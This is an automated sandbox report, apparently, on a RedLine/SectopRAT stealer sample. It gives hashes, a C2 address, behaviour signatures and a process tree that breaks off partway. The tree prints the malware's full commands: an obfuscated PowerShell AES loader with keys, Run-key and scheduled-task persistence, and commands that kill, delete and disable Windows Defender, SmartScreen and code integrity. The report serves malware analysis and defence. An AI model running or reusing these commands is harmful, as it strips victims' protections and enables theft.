Analysis

  • max time kernel
    116s
  • max time network
    117s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250314-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
  • submitted
    18/03/2025, 16:26

General

  • Target

    B4B2DF0C17B9CC137372CFB2165D613B.exe

  • Size

    760KB

  • MD5

    b4b2df0c17b9cc137372cfb2165d613b

  • SHA1

    11f44e224ac71e5de4f70ed47ec0653cab0ce0f1

  • SHA256

    d876ec8738585be11926c0ef2eff5b2d006b1218ec2ef5f652affa2f2e696c1c

  • SHA512

    6a31601940c0a941ad7bc1b56231e9025477d9137e0d683e9085c890ef59d4085262ee4de2664695c3a2209ff4420c64734e38ce24af9722b5f538d2b2bb7798

  • SSDEEP

    12288:AUIDlUvK90yHVBZCs/X8RKbbir1QVt3Wgcf64sE8LZfAFoVbp+iaGMgEnhr6JvLg:GjWmppBeb5wjw

Malware Config

Extracted

Family

redline

Botnet

cheat

C2

193.233.113.113:35361

Signatures

  • Contains code to disable Windows Defender 2 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender DisableAntiSpyware settings 3 TTPs 1 IoCs
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Modifies Windows Defender TamperProtection settings 3 TTPs 3 IoCs
  • Modifies firewall policy service 3 TTPs 2 IoCs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 1 IoCs
  • Redline family
  • SectopRAT

    SectopRAT is a remote access trojan first seen in November 2019.

  • SectopRAT payload 1 IoCs
  • Sectoprat family
  • UAC bypass 3 TTPs 1 IoCs
  • Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 38 IoCs

    Using powershell.exe command.

  • Disables Task Manager via registry modification
  • Disables use of System Restore points 1 TTPs
  • Modifies Windows Firewall 2 TTPs 1 IoCs
  • Stops running service(s) 4 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 30 IoCs
  • Indicator Removal: Clear Persistence 1 TTPs 1 IoCs

    Clear artifacts associated with previously established persistence like scheduletasks on a host.

  • Indicator Removal: File Deletion 1 TTPs

    Adversaries may delete files left behind by the actions of their intrusion activity.

  • Launches sc.exe 1 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Kills process with taskkill 9 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe
    "C:\Users\Admin\AppData\Local\Temp\B4B2DF0C17B9CC137372CFB2165D613B.exe"
    1⤵
    • Checks computer location settings
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: GetForegroundWindowSpam
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:6116
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c ""C:\cqxwsvrp.vd1.bat" "
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1948
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('mLV7KrO3wLHHAAm4GaaFGgjj/GUAMMVOaPh3FGpoUZs='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('BMXXbGgs1mALdsCSxvMtpA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZWVZX=New-Object System.IO.MemoryStream(,$param_var); $Tupqk=New-Object System.IO.MemoryStream; $pEVyq=New-Object System.IO.Compression.GZipStream($ZWVZX, [IO.Compression.CompressionMode]::Decompress); $pEVyq.CopyTo($Tupqk); $pEVyq.Dispose(); $ZWVZX.Dispose(); $Tupqk.Dispose(); $Tupqk.ToArray();}function execute_function($param_var,$param2_var){ $YwxMS=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ALVCG=$YwxMS.EntryPoint; $ALVCG.Invoke($null, $param2_var);}$bwlKi = 'C:\cqxwsvrp.vd1.bat';$host.UI.RawUI.WindowTitle = $bwlKi;$NiVuC=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bwlKi).Split([Environment]::NewLine);foreach ($OBjYH in $NiVuC) { if ($OBjYH.StartsWith('EiQdPpTgEPKAUuFHgbxm')) { $JPYHw=$OBjYH.Substring(20); break; }}$payloads_var=[string[]]$JPYHw.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
        3⤵
          PID:3220
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -w hidden
          3⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3904
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\1sys20kx.h5i.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:5232
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('8PEylQItydp6DF2KLKsDsMrVgiK6Anhs4Yd2E90Yt80='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('IfesP7NShxOIaefsOsYtLQ=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $EgdKe=New-Object System.IO.MemoryStream(,$param_var); $IqEPB=New-Object System.IO.MemoryStream; $NGAHc=New-Object System.IO.Compression.GZipStream($EgdKe, [IO.Compression.CompressionMode]::Decompress); $NGAHc.CopyTo($IqEPB); $NGAHc.Dispose(); $EgdKe.Dispose(); $IqEPB.Dispose(); $IqEPB.ToArray();}function execute_function($param_var,$param2_var){ $TAWjc=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $hYpAi=$TAWjc.EntryPoint; $hYpAi.Invoke($null, $param2_var);}$bHXSX = 'C:\Users\Admin\AppData\Local\Temp\1sys20kx.h5i.bat';$host.UI.RawUI.WindowTitle = $bHXSX;$AnHdV=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($bHXSX).Split([Environment]::NewLine);foreach ($Yltfo in $AnHdV) { if ($Yltfo.StartsWith('CFYIvkGECqujgRZhzKOC')) { $GVQOC=$Yltfo.Substring(20); break; }}$payloads_var=[string[]]$GVQOC.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
          3⤵
            PID:2552
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
            3⤵
            • Command and Scripting Interpreter: PowerShell
            • Adds Run key to start application
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1360
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1224
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3240
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4664
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5996
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3768
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4976
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunServicesOnce' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5752
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SYSTEM\CurrentControlSet\Services' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3528
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1992
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5908
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3620
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" -WindowStyle Hidden -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx' -Name 'WindowsInstaller' -Value 'C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe'"
          2⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1080
        • C:\Windows\SYSTEM32\schtasks.exe
          "schtasks" /create /tn "lockwin" /sc MINUTE /mo 1 /tr "C:\Users\Admin\AppData\Local\Temp\0h4sagxy.p0j.exe" /rl LIMITED /f
          2⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1972
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthService.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5280
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im SecurityHealthService.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:4088
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im SecurityHealthSystray.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:5260
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im SecurityHealthSystray.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5392
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im NisSrv.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4640
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im NisSrv.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5504
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im MsMpEng.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1848
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im MsMpEng.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1536
        • C:\Windows\SYSTEM32\taskkill.exe
          "taskkill.exe" /im Explorer.exe /f
          2⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3576
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im SmartScreen.exe
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:2556
          • C:\Windows\system32\taskkill.exe
            taskkill /f /im SmartScreen.exe
            3⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:1448
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /c taskkill /f /im mrt.exe
          2⤵
            PID:2072
            • C:\Windows\system32\taskkill.exe
              taskkill /f /im mrt.exe
              3⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4388
          • C:\Windows\SYSTEM32\taskkill.exe
            "taskkill.exe" /im Explorer.exe /f
            2⤵
            • Kills process with taskkill
            • Suspicious use of AdjustPrivilegeToken
            PID:5256
          • C:\Windows\System32\cmd.exe
            "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\MsMpEng.exe"
            2⤵
              PID:3280
            • C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\NisSrv.exe"
              2⤵
                PID:5200
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\mrt.exe"
                2⤵
                  PID:2160
                • C:\Windows\System32\cmd.exe
                  "C:\Windows\System32\cmd.exe" /c del /f /q "C:\Windows\System32\smartscreen.exe"
                  2⤵
                    PID:4200
                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                    2⤵
                    • Command and Scripting Interpreter: PowerShell
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:5196
                  • C:\Windows\System32\cmd.exe
                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                    2⤵
                      PID:1820
                      • C:\Windows\system32\reg.exe
                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
                        3⤵
                        • Modifies Windows Defender DisableAntiSpyware settings
                        PID:1420
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
                      2⤵
                        PID:1624
                        • C:\Windows\system32\reg.exe
                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SubmitSamplesConsent /t REG_DWORD /d 0 /f
                          3⤵
                            PID:2128
                        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -SubmitSamplesConsent 0"
                          2⤵
                          • Command and Scripting Interpreter: PowerShell
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          PID:2876
                        • C:\Windows\System32\cmd.exe
                          "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                          2⤵
                            PID:5064
                            • C:\Windows\system32\reg.exe
                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                              3⤵
                                PID:4704
                            • C:\Windows\System32\cmd.exe
                              "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
                              2⤵
                                PID:4568
                                • C:\Windows\system32\reg.exe
                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /v SpynetReporting /t REG_DWORD /d 0 /f
                                  3⤵
                                    PID:6108
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5100
                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -MAPSReporting Disabled"
                                  2⤵
                                  • Command and Scripting Interpreter: PowerShell
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:5416
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                  2⤵
                                    PID:1680
                                    • C:\Windows\system32\reg.exe
                                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
                                      3⤵
                                      • Modifies Windows Defender Real-time Protection settings
                                      PID:2604
                                  • C:\Windows\System32\cmd.exe
                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
                                    2⤵
                                      PID:2004
                                      • C:\Windows\system32\reg.exe
                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
                                        3⤵
                                        • Modifies Windows Defender Real-time Protection settings
                                        PID:4792
                                    • C:\Windows\System32\cmd.exe
                                      "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
                                      2⤵
                                        PID:4624
                                        • C:\Windows\system32\reg.exe
                                          reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
                                          3⤵
                                          • Modifies Windows Defender Real-time Protection settings
                                          PID:4184
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableRealtimeMonitoring $true"
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1184
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableBehaviorMonitoring $true"
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:4608
                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -DisableOnAccessProtection $true"
                                        2⤵
                                        • Command and Scripting Interpreter: PowerShell
                                        • Suspicious behavior: EnumeratesProcesses
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:1100
                                      • C:\Windows\System32\cmd.exe
                                        "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                                        2⤵
                                          PID:5336
                                          • C:\Windows\system32\reg.exe
                                            reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ExploitGuard\Controlled Folder Access" /v EnableControlledFolderAccess /t REG_DWORD /d 0 /f
                                            3⤵
                                              PID:1328
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-MpPreference -EnableControlledFolderAccess Disabled"
                                            2⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:3632
                                          • C:\Windows\System32\cmd.exe
                                            "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
                                            2⤵
                                              PID:1272
                                              • C:\Windows\system32\reg.exe
                                                reg add "HKLM\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\KernelModeCodeIntegrity" /v Enabled /t REG_DWORD /d 0 /f
                                                3⤵
                                                  PID:640
                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ProcessMitigation -System -Disable KernelModeCodeIntegrity"
                                                2⤵
                                                • Command and Scripting Interpreter: PowerShell
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:2480
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
                                                2⤵
                                                  PID:1080
                                                  • C:\Windows\system32\reg.exe
                                                    reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v SmartScreenEnabled /t REG_SZ /d Off /f
                                                    3⤵
                                                      PID:1496
                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer' -Name 'SmartScreenEnabled' -Value 'Off'"
                                                    2⤵
                                                    • Command and Scripting Interpreter: PowerShell
                                                    • Suspicious behavior: EnumeratesProcesses
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:4088
                                                  • C:\Windows\System32\cmd.exe
                                                    "C:\Windows\System32\cmd.exe" /c reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
                                                    2⤵
                                                      PID:3108
                                                      • C:\Windows\system32\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter" /v EnabledV9 /t REG_DWORD /d 0 /f
                                                        3⤵
                                                          PID:2312
                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "Set-ItemProperty -Path 'HKLM:\SOFTWARE\Policies\Microsoft\MicrosoftEdge\PhishingFilter' -Name 'EnabledV9' -Value 0"
                                                        2⤵
                                                        • Command and Scripting Interpreter: PowerShell
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:5440
                                                      • C:\Windows\System32\cmd.exe
